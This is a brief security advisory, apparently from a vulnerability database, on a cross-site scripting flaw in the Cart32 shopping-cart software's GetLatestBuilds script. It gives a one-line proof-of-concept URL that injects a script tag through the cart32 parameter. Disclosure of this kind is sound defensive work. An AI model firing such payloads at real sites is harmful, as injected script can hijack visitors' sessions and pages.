McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Script Cross-Site Scripting Vulnerability

McMurtrey/Whitaker & Associates Cart32 GetLatestBuilds Script Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/scripts/cart32.exe/GetLatestBuilds?cart32=&lt;script&gt;alert('XSS')&lt;/script&gt;